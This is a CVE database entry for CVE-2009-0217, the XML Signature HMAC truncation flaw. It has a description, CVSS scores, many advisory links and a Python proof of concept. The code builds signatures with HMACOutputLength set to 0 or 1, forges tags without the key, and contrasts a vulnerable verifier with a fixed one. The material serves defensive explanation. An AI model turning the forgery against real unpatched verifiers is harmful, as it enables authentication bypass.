CVE-2009-0217

medium

Description

The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits.
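The following worked example, added here as an illustration and not taken from any of the implementations the description lists, models the flaw and its fix in about eighty lines of Python. It builds a minimal hmac-sha1 ds:Signature, shows a verifier that honours whatever HMACOutputLength the document asks for (the pre-fix behaviour), shows an attacker who has no key but chooses HMACOutputLength of 0 or 1 so the truncated tag has one or two possible values, and shows the hardened verifier applying the floor that the W3C erratum (E03, referenced below) introduced: at least 80 bits and at least half the hash output. Assumptions are labelled in the code: ElementTree's own serialization stands in for C14N, reference digests are not checked, and the key and DigestValue are constructed placeholders.

```python
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
HMAC_SHA1 = "http://www.w3.org/2000/09/xmldsig#hmac-sha1"
ET.register_namespace("ds", DS_NS)  # keep the "ds" prefix stable across re-serialization

# Constructed shared secret; in SAML/WS-Security this is the key the verifier resolves from KeyInfo.
KEY = b"constructed-shared-secret"
# Constructed placeholder DigestValue (base64 of SHA-1 of the empty string); reference
# digest checking is out of scope here, only the SignatureValue check is modelled.
PLACEHOLDER_DIGEST = "2jmj7l5rSw0yVb/vlWAYkK/YBwk="


def build_signature(output_length=None, signature_value_b64=""):
    """Minimal ds:Signature with an hmac-sha1 SignatureMethod (constructed sample)."""
    length_el = (f"<ds:HMACOutputLength>{output_length}</ds:HMACOutputLength>"
                 if output_length is not None else "")
    return (
        f'<ds:Signature xmlns:ds="{DS_NS}"><ds:SignedInfo>'
        '<ds:CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>'
        f'<ds:SignatureMethod Algorithm="{HMAC_SHA1}">{length_el}</ds:SignatureMethod>'
        '<ds:Reference URI="#doc">'
        '<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>'
        f"<ds:DigestValue>{PLACEHOLDER_DIGEST}</ds:DigestValue></ds:Reference>"
        f"</ds:SignedInfo><ds:SignatureValue>{signature_value_b64}</ds:SignatureValue>"
        "</ds:Signature>"
    )


def serialize_signed_info(sig):
    """Stand-in for C14N (assumption): ElementTree's own serialization of ds:SignedInfo.
    Acceptable here only because signer and verifier share the same routine."""
    return ET.tostring(sig.find(f"{{{DS_NS}}}SignedInfo"))


def truncate_mac(mac, bits):
    """Leftmost `bits` bits of the MAC, as HMACOutputLength prescribes (RFC 2104 truncation)."""
    full, rem = divmod(bits, 8)
    out = bytearray(mac[:full])
    if rem:
        out.append(mac[full] & (0xFF << (8 - rem)) & 0xFF)
    return bytes(out)


def sign(key, output_length=None):
    """Legitimate signer: HMAC-SHA1 over SignedInfo, optionally truncated."""
    sig = ET.fromstring(build_signature(output_length))
    bits = output_length if output_length is not None else 160
    mac = truncate_mac(hmac.new(key, serialize_signed_info(sig), hashlib.sha1).digest(), bits)
    sig.find(f"{{{DS_NS}}}SignatureValue").text = base64.b64encode(mac).decode()
    return ET.tostring(sig, encoding="unicode")


def _verify(key, signature_xml, enforce_minimum):
    sig = ET.fromstring(signature_xml)
    method = sig.find(f"{{{DS_NS}}}SignedInfo/{{{DS_NS}}}SignatureMethod")
    if method is None or method.get("Algorithm") != HMAC_SHA1:
        return False
    digest_bits = hashlib.sha1().digest_size * 8  # 160
    length_el = method.find(f"{{{DS_NS}}}HMACOutputLength")
    bits = int(length_el.text) if length_el is not None else digest_bits
    if enforce_minimum:
        # The fix (W3C erratum E03): at least 80 bits and at least half the hash output;
        # anything else, including 0 or over-length values, is rejected before any MAC is computed.
        if bits < max(80, digest_bits // 2) or bits > digest_bits:
            return False
    expected = truncate_mac(hmac.new(key, serialize_signed_info(sig), hashlib.sha1).digest(), bits)
    presented = base64.b64decode(sig.findtext(f"{{{DS_NS}}}SignatureValue") or "")
    # With bits == 0 both sides are b"" and this comparison is trivially true.
    return hmac.compare_digest(expected, presented)


def verify_vulnerable(key, signature_xml):
    """Pre-fix behaviour: honours any HMACOutputLength the document asks for."""
    return _verify(key, signature_xml, enforce_minimum=False)


def verify_fixed(key, signature_xml):
    """Post-fix behaviour: enforces the minimum truncation length."""
    return _verify(key, signature_xml, enforce_minimum=True)


def forge(bits):
    """Attacker without the key: pick a tiny HMACOutputLength so the truncated tag has only
    2**bits possible values, and return one candidate Signature for each of them."""
    nbytes = (bits + 7) // 8
    return [build_signature(bits, base64.b64encode((v << (-bits % 8)).to_bytes(nbytes, "big")).decode())
            for v in range(2 ** bits)]


if __name__ == "__main__":
    for bits in (0, 1):
        hits = sum(verify_vulnerable(KEY, c) for c in forge(bits))
        print(f"HMACOutputLength={bits}: {hits} of {2 ** bits} forged candidates accepted by the "
              f"vulnerable verifier, {sum(verify_fixed(KEY, c) for c in forge(bits))} by the fixed one")
```

The point the code makes is that HMACOutputLength lives inside SignedInfo, so it is nominally covered by the signature, yet the verifier has to read it before it can check anything; once the attacker sets it to 0 the comparison is between two empty strings, and at 1 bit a second try is all it takes. Note also that the fixed verifier rejects a legitimately produced 64-bit truncation, which is the compatibility cost the affected vendors documented in their advisories.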

References

http://blogs.sun.com/security/entry/cert_vulnerability_note_vu_466161

http://git.gnome.org/cgit/xmlsec/commit/?id=34b349675af9f72eb822837a8772cc1ead7115c7

http://git.gnome.org/cgit/xmlsec/patch/?id=34b349675af9f72eb822837a8772cc1ead7115c7

http://lists.apple.com/archives/security-announce/2009/Sep/msg00000.html

http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00002.html

http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00005.html

http://marc.info/?l=bugtraq&m=125787273209737&w=2

http://osvdb.org/55895

http://osvdb.org/55907

http://secunia.com/advisories/34461

http://secunia.com/advisories/35776

http://secunia.com/advisories/35852

http://secunia.com/advisories/35853

http://secunia.com/advisories/35854

http://secunia.com/advisories/35855

http://secunia.com/advisories/35858

http://secunia.com/advisories/36162

http://secunia.com/advisories/36176

http://secunia.com/advisories/36180

http://secunia.com/advisories/36494

http://secunia.com/advisories/37300

http://secunia.com/advisories/37671

http://secunia.com/advisories/37841

http://secunia.com/advisories/38567

http://secunia.com/advisories/38568

http://secunia.com/advisories/38695

http://secunia.com/advisories/38921

http://secunia.com/advisories/41818

http://secunia.com/advisories/60799

http://sunsolve.sun.com/search/document.do?assetkey=1-21-125136-16-1

http://sunsolve.sun.com/search/document.do?assetkey=1-66-263429-1

http://sunsolve.sun.com/search/document.do?assetkey=1-66-269208-1

http://sunsolve.sun.com/search/document.do?assetkey=1-77-1020710.1-1

http://svn.apache.org/viewvc?revision=794013&view=revision

http://www.aleksey.com/xmlsec/

http://www.debian.org/security/2010/dsa-1995

http://www.gentoo.org/security/en/glsa/glsa-201408-19.xml

http://www.kb.cert.org/vuls/id/466161

http://www.kb.cert.org/vuls/id/MAPG-7TSKXQ

http://www.kb.cert.org/vuls/id/WDON-7TY529

http://www.mandriva.com/security/advisories?name=MDVSA-2009:209

http://www.mono-project.com/Vulnerabilities

http://www.openoffice.org/security/cves/CVE-2009-0217.html

http://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html

http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.html

http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html

http://www.redhat.com/support/errata/RHSA-2009-1694.html

http://www.securityfocus.com/bid/35671

http://www.securitytracker.com/id?1022561

http://www.securitytracker.com/id?1022567

http://www.securitytracker.com/id?1022661

http://www.ubuntu.com/usn/USN-903-1

http://www.us-cert.gov/cas/techalerts/TA09-294A.html

http://www.us-cert.gov/cas/techalerts/TA10-159B.html

http://www.vupen.com/english/advisories/2009/1900

http://www.vupen.com/english/advisories/2009/1908

http://www.vupen.com/english/advisories/2009/1909

http://www.vupen.com/english/advisories/2009/1911

http://www.vupen.com/english/advisories/2009/2543

http://www.vupen.com/english/advisories/2009/3122

http://www.vupen.com/english/advisories/2010/0366

http://www.vupen.com/english/advisories/2010/0635

http://www.w3.org/2008/06/xmldsigcore-errata.html#e03

http://www.w3.org/QA/2009/07/hmac_truncation_in_xml_signatu.html

http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023545&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere

http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023723&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere

http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg21384925

https://bugzilla.redhat.com/show_bug.cgi?id=511915

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-041

https://issues.apache.org/bugzilla/show_bug.cgi?id=47526

https://issues.apache.org/bugzilla/show_bug.cgi?id=47527

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10186

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7158

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8717

https://rhn.redhat.com/errata/RHSA-2009-1200.html

https://rhn.redhat.com/errata/RHSA-2009-1201.html

https://rhn.redhat.com/errata/RHSA-2009-1428.html

https://rhn.redhat.com/errata/RHSA-2009-1636.html

https://rhn.redhat.com/errata/RHSA-2009-1637.html

https://rhn.redhat.com/errata/RHSA-2009-1649.html

https://rhn.redhat.com/errata/RHSA-2009-1650.html

https://usn.ubuntu.com/826-1/

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00310.html

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00325.html

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00494.html

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00505.html

Details

Source: MITRE

Published: 2009-07-14

Updated: 2018-10-12

Risk Information

CVSS v2

Base Score: 5

Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Impact Score: 2.9

Exploitability Score: 10

Severity: MEDIUM